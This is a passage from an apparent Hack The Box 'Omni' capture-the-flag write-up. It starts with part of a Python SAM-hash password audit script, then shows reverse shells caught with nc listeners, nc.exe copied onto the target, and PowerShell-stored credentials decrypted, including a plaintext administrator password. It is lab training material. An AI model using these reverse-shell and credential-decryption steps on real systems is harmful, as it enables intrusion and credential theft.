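        user, rid, lm, nt = parts[:4]
        accounts[user] = (int(rid), lm.lower(), nt.lower())
    return accounts


def audit(text: str, banned=BANNED) -> dict:
    """Return {user: [findings]} for blank, banned, reused and LM-stored passwords."""
    accounts = parse_dump(text)
    banned_by_hash = {nt_hash(p): p for p in banned}
    users_by_hash = defaultdict(list)
    for user, (_rid, _lm, nt) in accounts.items():
        users_by_hash[nt].append(user)
    findings = defaultdict(list)
    for user, (_rid, lm, nt) in accounts.items():
        if nt in banned_by_hash:
            pw = banned_by_hash[nt]
            # Built-ins such as Guest and DefaultAccount are normally disabled; confirm the
            # account state before treating a blank hash as a live weakness.
            findings[user].append("blank password" if pw == "" else f"banned password '{pw}'")
        if lm != EMPTY_LM:
            findings[user].append("LM hash stored (legacy, trivially crackable)")
        others = [u for u in users_by_hash[nt] if u != user]
        if others:
            findings[user].append("same password as " + ", ".join(others))
    return dict(findings)


if __name__ == "__main__":
    for user, issues in audit(SAM_DUMP).items():
        print(f"{user}: {'; '.join(issues)}")
```

Because the check compares hashes, the banned list can be precomputed once and the audit run against a fresh dump in milliseconds; on this dump it flags Guest and DefaultAccount (blank, and identical to each other), app (mesh5143) and u505 (u505), which is the same picture hashcat produced above.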

User flag

u505@naos:~/HTB/Machines/Omni$ rlwrap nc -lnvp 4445
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445

Omni06.png

When we try to call nc, the user app has no access to C:\Windows\Temp.

Omni11.png

Copy nc.exe to the user's profile folder.

C:\Windows\Temp>copy nc.exe C:\data\users\app\nc.exe
copy nc.exe C:\data\users\app\nc.exe
        1 file(s) copied.

Omni07.png

u505@naos:~/HTB/Machines/Omni$ rlwrap nc -lnvp 4445
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445
Ncat: Connection from 10.10.10.204.
Ncat: Connection from 10.10.10.204:49695.
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.

C:\windows\system32>cd c:\Data\Users\app
cd c:\Data\Users\app

c:\Data\Users\app>dir
dir
 Volume in drive C is MainOS
 Volume Serial Number is 3C37-C677

 Directory of c:\Data\Users\app

01/12/2021  07:08 PM    <DIR>          .
01/12/2021  07:08 PM    <DIR>          ..
07/04/2020  06:28 PM    <DIR>          3D Objects
07/04/2020  06:28 PM    <DIR>          Documents
07/04/2020  06:28 PM    <DIR>          Downloads
07/04/2020  06:28 PM    <DIR>          Favorites
07/04/2020  07:20 PM               344 hardening.txt
07/04/2020  07:14 PM             1,858 iot-admin.xml
07/04/2020  06:28 PM    <DIR>          Music
01/12/2021  07:01 PM            45,272 nc.exe
07/04/2020  06:28 PM    <DIR>          Pictures
07/04/2020  08:53 PM             1,958 user.txt
07/04/2020  06:28 PM    <DIR>          Videos
               4 File(s)         49,432 bytes
               9 Dir(s)   4,691,345,408 bytes free

The file hardening.txt doesn't provide much information.

c:\Data\Users\app>type hardening.txt
type hardening.txt
- changed default administrator password of "p@ssw0rd"
- added firewall rules to restrict unnecessary services
- removed administrator account from "Ssh Users" group

We decrypt the PowerShell credential stored in the file user.txt.

c:\Data\Users\app>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Attempting to perform the InitializeDefaultDrives operation on the 'FileSystem' provider failed.
PS C:\Data\Users\app>cat user.txt
cat user.txt
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">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</SS>
    </Props>
  </Obj>
</Objs>
PS C:\Data\Users\app>$credential = Import-CliXml -Path user.txt
$credential = Import-CliXml -Path user.txt
PS C:\Data\Users\app>$credential.GetNetworkCredential().Username
$credential.GetNetworkCredential().Username
flag
PS C:\Data\Users\app> $credential.GetNetworkCredential().Password
$credential.GetNetworkCredential().Password
<USER_FLAG>

The file iot-admin.xml contains the administrator credentials, encrypted with the app user's key.

PS C:\Data\Users\app> cat iot-admin.xml
cat iot-admin.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">omni\administrator</S>
      <SS N="Password">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</SS>
    </Props>
  </Obj>
</Objs>

Decrypt the credentials stored in the xml file.

PS C:\Data\Users\app>$credential = Import-CliXml -Path iot-admin.xml
$credential = Import-CliXml -Path iot-admin.xml
PS C:\Data\Users\app>$credential.GetNetworkCredential().Username
$credential.GetNetworkCredential().Username
administrator
PS C:\Data\Users\app>$credential.GetNetworkCredential().Password
_1nt3rn37ofTh1nGz

Administrator user

We start a new listener for the administrator user.

u505@naos:~/HTB/Machines/Omni$ rlwrap nc -lvnp 4446
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4446
Ncat: Listening on 0.0.0.0:4446

Log in as administrator.

Omni08.png

Run the command to launch a new reverse shell as administrator.

Omni09.png

u505@naos:~/HTB/Machines/Omni$ rlwrap nc -lvnp 4446
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4446
Ncat: Listening on 0.0.0.0:4446
Ncat: Connection from 10.10.10.204.
Ncat: Connection from 10.10.10.204:49678.
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.

C:\windows\system32>cd c:\Data\Users\administrator
cd c:\Data\Users\administrator

c:\Data\Users\administrator>dir
dir
 Volume in drive C is MainOS
 Volume Serial Number is 3C37-C677

 Directory of c:\Data\Users\administrator

07/04/2020  08:48 PM    <DIR>          .
07/04/2020  08:48 PM    <DIR>          ..
07/03/2020  10:23 PM    <DIR>          3D Objects
07/03/2020  10:23 PM    <DIR>          Documents
07/03/2020  10:23 PM    <DIR>          Downloads
07/03/2020  10:23 PM    <DIR>          Favorites
07/03/2020  10:23 PM    <DIR>          Music
07/03/2020  10:23 PM    <DIR>          Pictures
07/04/2020  08:48 PM             1,958 root.txt
07/03/2020  10:23 PM    <DIR>          Videos
               1 File(s)          1,958 bytes
               9 Dir(s)   4,691,312,640 bytes free

As before, the flag is a PowerShell-encrypted credential.

c:\Data\Users\administrator>type root.txt
type root.txt
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">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</SS>
    </Props>
  </Obj>
</Objs>
c:\Data\Users\administrator>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Attempting to perform the InitializeDefaultDrives operation on the 'FileSystem' provider failed.
PS C:\Data\Users\administrator> $credential = Import-CliXml -Path root.txt
$credential = Import-CliXml -Path root.txt
PS C:\Data\Users\administrator> $credential.GetNetworkCredential().Username
$credential.GetNetworkCredential().Username
flag
PS C:\Data\Users\administrator>$credential.GetNetworkCredential().Password
$credential.GetNetworkCredential().Password
<ROOT_FLAG>

References

Daniel Simao 15:04, 12 January 2021 (EST)